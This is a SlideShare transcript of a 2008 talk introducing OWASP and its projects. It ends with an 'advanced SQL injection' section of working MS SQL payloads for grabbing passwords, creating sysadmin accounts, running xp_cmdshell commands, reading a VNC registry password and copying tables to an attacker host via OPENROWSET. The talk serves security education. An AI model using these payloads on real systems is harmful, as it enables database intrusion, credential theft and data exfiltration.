Your SlideShare is downloading. ×
OWASP an Introduction
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

OWASP an Introduction

1,798
views

Published on

Small presentation about Web Application Security and SQL Injection.

Small presentation about Web Application Security and SQL Injection.


0 Comments
5 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,798
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
0
Likes
5
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide
  • Transcript

    • 1. OWASP: An Introduction Alessio Marziali December, 2008 alessio.marziali @cyphersec.com
    • 2. Agenda
      • What is OWASP?
        • General Overview of OWASP
        • OWASP Projects
        • OWASP Guides
      • OWASP EU Summit 2008
      • OWASP Code Crawler
      • What is Application Security?
      • Play time, Advanced SQL Injection (fun!)
    • 3. What is OWASP?
      • Open Web Application Security Project
        • The OWASP Foundation is a United States based 501(c)(3) (no profit) entity that provides the infrastructure for the OWASP Community.
        • Focused primarily on the “back-end” than “web-design” issues.
        • Promotes secure software development
        • An open forum for discussion
        • A free resource for any development team
    • 4. What is OWASP?
      • Open Web Application Security Project
        • Non-profit, volunteer driven organization
          • All members are volunteers
          • All work is donated by sponsors
        • Provide free resources to the community
          • Publications, Articles, Standards
          • Testing and Training Software
          • Local Chapters & Mailing Lists
        • Supported through sponsorships
          • Corporate support through financial or project sponsorship
          • Personal sponsorships from members
    • 5. OWASP Sponsors
    • 6. What is OWASP?
      • What do they provide?
        • Publications
          • OWASP Top 10
          • OWASP Guide to Building Secure Web Applications
        • Software (just most important)
          • WebGoat
          • WebScarab
          • .NET Projects
        • Local Chapters
          • Community Orientation
    • 7. OWASP Publications
      • Major Publications
      • Top 10 Web Application Security Vulnerabilities
        • G uide to Building Secure Web Applications
        • Testing Project
        • AppSec Faq
    • 8. OWASP Publications
      • Common Features
        • All OWASP publications are available free for download from http://www.owasp.org
        • Publications are released under GNU “Lesser” GNU Public License agreement, or the GNU Free Documentation License (GFDL)
        • Living Documents
          • Updating as needed
          • Ongoing Projects
        • OWASP Publications feature collaborative work in a competitive field
    • 9. OWASP Publications – OWASP TOP 10
      • Top 10 Web Application Security Vulnerabilities
        • A list of the 10 most severe security issues
        • Updated on a yearly basis
        • Address issues with applications on the perimeter
        • Growing industry acceptance
          • Federal Trade Commission (US Gov)
          • NSA – National Security Agency (US Gov)
          • US Defense Information Systems Agency
          • VISA (Cardholder Information Security Program)
          • British Telecom
          • Bureau of Alcohol, Tobacco, and Firearms (ATF)
    • 10. OWASP Publications - OWASP TOP 10
    • 11. OWASP Publications - OWASP Guides
      • Guide to Building Secure Web Applications
        • Provides a baseline for developing secure software
          • Introduction to security in general
          • Introduction to application level security
          • Discusses key implementation areas
            • Architecture
            • Authentication
            • Session Management
            • Access Controls and Authorization
            • Event Logging
            • Data Validation
        • Under continuous development
    • 12. OWASP Software
      • Major Applications
      • WebGoat
      • WebScarab
      • .Net Projects
    • 13. OWASP Software
      • Common Features
        • All OWASP software are provided free for download from http://www.owasp.org
        • Software is released under GNU “Lesser” GNU Public License agreement
        • Active Projects
          • Updating as needed
          • Ongoing Projects
          • Many maintainers and contributors
        • OWASP Software is free for download and can be used by individuals or businesses
    • 14. OWASP Software - WebGoat
      • WebGoat
        • Primarily a training application
        • Provides
          • An educational tool for learning about application security
          • A baseline to test security tools against (i.e. known issues)
        • What is it?
          • A J2EE web application arranged in “Security Lessons”
          • Based on Tomcat and JDK 1.5
          • Oriented to learning
            • Easy to use
            • Illustrates credible scenarios
            • Teaches realistic attacks, and viable solutions
    • 15. OWASP Software - WebGoat
      • WebGoat – What can you learn?
        • A number of constantly growing attacks and solutions
          • Cross Site Scripting
          • SQL Injection Attacks
          • Thread Safety
          • Field & Parameter Manipulation
          • Session Hijacking and Management
          • Weak Authentication Mechanisms
          • Many more attacks added
        • Getting the Tools
          • http://www.owasp.org/software/webgoat.html
          • Simply download, unzip, and execute
    • 16. OWASP Software - WebScarab
      • WebScarab
        • A framework for analyzing HTTP/HTTPS traffic
        • Written in Java
        • Multiple Uses
          • Developer: Debug exchanges between client and server
          • Security Analyst: Analyze traffic to identify vulnerabilities
        • Technical Tool
          • Focused on software developers
          • Extensible plug-in architecture
          • Open source; easy to extend core system
          • Very powerful tool
        • Getting the Tool
          • http://www.owasp.org/software/webscarab.html
    • 17. OWASP Software - WebScarab
      • What can it do?
        • Features
          • Fragment Analysis – extract scripts and html as presented to the browser, instead of source code presented by the browser post render
          • Proxy – observe traffic between the browser and server, includes the ability to modify data in transit, expose hidden fields, and perform bandwidth manipulation
          • BeanShell – the ability to execute Java code on requests and responses before being transmitted between the browser and server; allows runtime extension of WebScarab
          • Spider – identifies new URLs within each page viewed
          • SessionID Analysis – Collection and analysis of cookies to determine predictability of session tokens
          • Much more…
    • 18. OWASP Software - .NET Projects
      • .Net Projects
        • A collection of tools focused on securing ASP.NET projects
        • Include security analyzers and documentation projects
        • Current Projects
          • Asp.Net Baseline Security – a suite of tools to assist administrators in identifying common issues in Asp.Net deployments
          • SAM’SHE – Security Analyzer for Microsofts Shared Hosting Environments – toolkit for administrators to identify issues in IIS 5 or 6 Asp.Net deployments
          • ANSA – Asp.Net Security Analyzer written in C# to identify configuration and software issues that impact security
          • Asp.Net Security Guides – a set of documents covering the design and deployment of secure software in Asp.Net hosting environments
        • http://www.owasp.org/software/dotnet.html
    • 19. OWASP Local Chapters
      • What do we have to offer?
        • Monthly Meetings
          • An opportunity to listen to monthly presentations introducing OWASP (prior to regular meetings)
          • An opportunity to attend special presentations focused on OWASP projects, and focusing on specific areas of interest
          • An opportunity to work with organizers to show additional presentations and develop workshops to address specific issues
          • An open environment for discussion of information security suitable for novices, professionals, and experts
          • Free Drinks !!!!!
    • 20. OWASP EU Summit 2008
      • "ALGARVE, PORTUGAL, November 7, 2008 – The Open Web Application Security Project (OWASP) today announced results from the annual OWASP Summit. Over 80 application security experts from over 20 countries joined forces to identify, coordinate, and prioritize our 2009 efforts to create a more secure Internet .“
    • 21. OWASP EU Summit 2008
      • OWASP Summer of Code 2008 Sponsored Projects
      • SETTING THE WEB APPLICATION SECURITY AGENDA FOR 2009 3th - 7th November 2008
    • 22. OWASP Code Crawler Project
    • 23. More about Code Crawler
      • Fast Scan
        • 1000~ lines of code (~ 3 seconds to review)
      • Multi Languages Support
        • .NET (C#,VB, don’t say F#!)
        • Java
      • Integrated Editor
        • Visual Studio Like visualisation
          • C# Code colouring
          • Even “#region” are supported
    • 24. Technologies used
      • .NET Framework 3.5 SP1
      • C# 3.0
      • Windows Forms
      • XSLT
      • Workflow Foundation
      • Microsoft Charts
      • XML/XPath
    • 25. Why We have to change the way we think
    • 26. Myth
      • Myth: “We are secure because we have a firewall ”
        • 75% of Internet Vulnerabilities are at Web Application Layer *
      • *GartnerGroup (2002 report)
    • 27. Source: Jeremiah Grossman, BlackHat 2001 Myth
    • 28.
      • Myth 2 – “We are secure because we use SSL”
        • Only secures data in transit
        • Does not solve vulnerabilities on:
          • Web server
          • Software
          • Browser
      Myth
    • 29. Source: Jeremiah Grossman, BlackHat 2001 Myth
    • 30. Myth Firewall Hardened OS Web Server App Server Firewall Databases Legacy Systems Web Services Directories Human Resrcs Billing Custom Developed Application Code APPLICATION ATTACK You can’t use network layer protection (firewall, SSL, IDS, hardening) to stop or detect application layer attacks Network Layer Application Layer Your security “perimeter” has huge holes at the application layer
    • 31. What is Web Application Security?
    • 32. Web Application Security
      • Combination of
        • People ,
        • Processes ,
        • and Technology
      • to identify, measure, and manage
        • Risk
      (*) Commercial Of The Shelf
    • 33. What is Web Application (in)Security?
    • 34. What is SQL Injection?
      • The ability to inject SQL commands into the database engine through an existing application
    • 35. How does SQL Injection work?
      • Common vulnerable login query
        • SELECT * FROM users
        • WHERE login = ' victor '
        • AND password = ' 123 '
      • (If it returns something then login!)
      • Pseudo Code MS SQL Server login syntax
        • var sql = " SELECT * FROM users
        • WHERE login = ' " + formusr +
        • " ' AND password = ' " + formpwd + " ' ";
    • 36. SQL Injection Testing Methodology 1) Input Validation 2) Info. Gathering 6) OS Cmd Prompt 7) Expand Influence 4) Extracting Data 3) 1=1 Attacks 5) OS Interaction
    • 37. Some differences MS SQL T-SQL MySQL Access Oracle PL/SQL DB2 Postgres PL/pgSQL Concatenate Strings ' '+' ' concat (" ", " ") " "&" " ' '||' ' " "+" " ' '||' ' Null replace I s null() I f null() Iff ( I s null ()) I f null() I f null () COALESCE() Position CHARINDEX LOCATE() InStr() InStr() InStr() TEXTPOS() Op Sys interaction xp_cmdshell select into outfile / dumpfile #date# utf_file import from export to Call Cast Yes No No No Yes Yes
    • 38. More differences… MS SQL MySQL Access Oracle DB2 Postgres UNION Y Y Y Y Y Y Subselects Y N 4.0 Y 4.1 N Y Y Y Batch Queries Y N* N N N Y Default stored procedures Many N N Many N N Linking DBs Y Y N Y Y N
    • 39. Enumerating table columns in different DBs
      • MS SQL
        • SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename ')
        • sp_columns tablename (this stored procedure can be used instead)
      • MySQL
        • show columns from tablename
      • Oracle
        • SELECT * FROM all_tab_columns WHERE table_name=' tablename '
      • DB2
        • SELECT * FROM syscat.columns WHERE tabname= ' tablename '
      • Postgres
        • SELECT attnum,attname from pg_class, pg_attribute WHERE relname= ' tablename ' AND pg_class.oid=attrelid AND attnum > 0
    • 40. 4) Extracting Data 4) Extracting Data 1) Input Validation 5) OS Interaction 6) OS Cmd Prompt 7) Expand Influence 2) Info. Gathering 3) 1=1 Attacks
    • 41. Password grabbing
      • Grabbing username and passwords from a User Defined table
        • '; begin declare @var varchar(8000) set @var=':' select @var=@var+' '+ login +'/'+ password +' ' from users where login>@var select @var as var into temp end --
        • ' and 1 in (select var from temp) --
        • ' ; drop table temp --
    • 42. Create DB Accounts
      • MS SQL
        • exec sp_addlogin ' victor ', ' Pass123 '
        • exec sp_addsrvrolemember 'victor', 'sysadmin'
      • MySQL
        • INSERT INTO mysql.user (user, host, password) VALUES (' victor ', 'localhost', PASSWORD(' Pass123 '))
      • Access
        • CREATE USER victor IDENTIFIED BY ' Pass123 '
      • Postgres (requires UNIX account)
        • CREATE USER victor WITH PASSWORD ' Pass123 '
      • Oracle
        • CREATE USER victor IDENTIFIED BY Pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;
        • GRANT CONNECT TO victor ;
        • GRANT RESOURCE TO victor ;
    • 43. Grabbing MS SQL Server Hashes
      • An easy query:
        • SELECT name, password FROM sysxlogins
      • But, hashes are varbinary
        • To display them correctly through an error message we need to Hex them
        • And then concatenate all
        • We can only fit 70 name/password pairs in a varchar
        • We can only see 1 complete pair at a time
      • Password field requires dbo access
        • With lower privileges we can still recover user names and brute force the password
    • 44. Transfer DB structure and data
      • Once network connectivity has been tested
      • SQL Server can be linked back to the attacker's DB by using OPENROWSET
      • DB Structure is replicated
      • Data is transferred
      • It can all be done by connecting to a remote port 80 (HTTP)!
    • 45. Transfer DB
      • '; insert into
        • OPENROWSET('SQLoledb',
        • 'uid= sa ;pwd= Pass123 ;Network=DBMSSOCN;Address= myIP , 80 ;',
        • 'select * from mydatabase..table1 ')
        • select * from database..table1 --
      • '; insert into
        • OPENROWSET('SQLoledb',
        • 'uid= sa ;pwd= Pass123 ;Network=DBMSSOCN;Address= myIP , 80 ;',
        • 'select * from mydatabase..table2 ')
        • select * from database..table2 --
    • 46. 5) OS Interaction 5) OS Interaction 6) OS Cmd Prompt 7) Expand Influence 1) Input Validation 2) Info. Gathering 3) 1=1 Attacks 4) Extracting Data
    • 47. Interacting with the OS
      • Two ways to interact with the OS:
        • Reading and writing system files from disk
          • Find passwords and configuration files
          • Change passwords and configuration
          • Execute commands by overwriting initialization or configuration files
        • Direct command execution
          • We can do anything
      • Both are restricted by the database's running privileges and permissions
    • 48. MS SQL OS Interaction
      • MS SQL Server
        • '; exec master..xp_cmdshell 'ipconfig > test.txt' --
        • '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' --
        • '; begin declare @data varchar(8000) ; set @data='| ' ; select @data=@data+txt+' | ' from tmp where txt<@data ; select @data as x into temp end --
        • ' and 1 in (select substring(x,1,256) from temp) --
        • '; declare @var sysname; set @var = 'del test.txt'; EXEC master..xp_cmdshell @var; drop table temp; drop table tmp --
    • 49. Gathering IP information through reverse lookups
      • Reverse DNS
        • '; exec master..xp_cmdshell 'nslookup a.com MyIP ' --
      • Reverse Pings
        • '; exec master..xp_cmdshell 'ping MyIP ' --
      • OPENROWSET
        • '; select * from OPENROWSET( 'SQLoledb', 'uid= sa ; pwd= Pass123 ; Network=DBMSSOCN; Address= MyIP , 80 ;', 'select * from table')
    • 50. Network Reconnaissance
      • Using the xp_cmdshell all the following can be executed:
        • Ipconfig /all
        • Tracert myIP
        • arp -a
        • nbtstat -c
        • netstat -ano
        • route print
    • 51. 6) OS Cmd Prompt 7) Expand Influence 3) 1=1 Attacks 4) Extracting Data 1) Input Validation 2) Info. Gathering 5) OS Interaction 6) OS Cmd Prompt
    • 52. Retrieving VNC Password from Registry
      • '; declare @out binary(8) exec master..xp_regread @rootkey =' HKEY_LOCAL_MACHINE ', @key =' SOFTWAREORLWinVNC3Default ', @value_name =' Password ', @value = @out output select cast(@out as bigint) as x into TEMP--
      • ' and 1 in ( select cast(x as varchar) from temp) --
    • 53. Links
      • A lot of SQL Injection related papers
        • http://www.nextgenss.com/papers.htm
        • http://www.spidynamics.com/support/whitepapers/
        • http://www.appsecinc.com/techdocs/whitepapers.html
        • http://www.atstake.com/research/advisories
      • Other resources
        • http://www.owasp.org
        • http://www.sqlsecurity.com
        • http://www.securityfocus.com/infocus/1768

    ×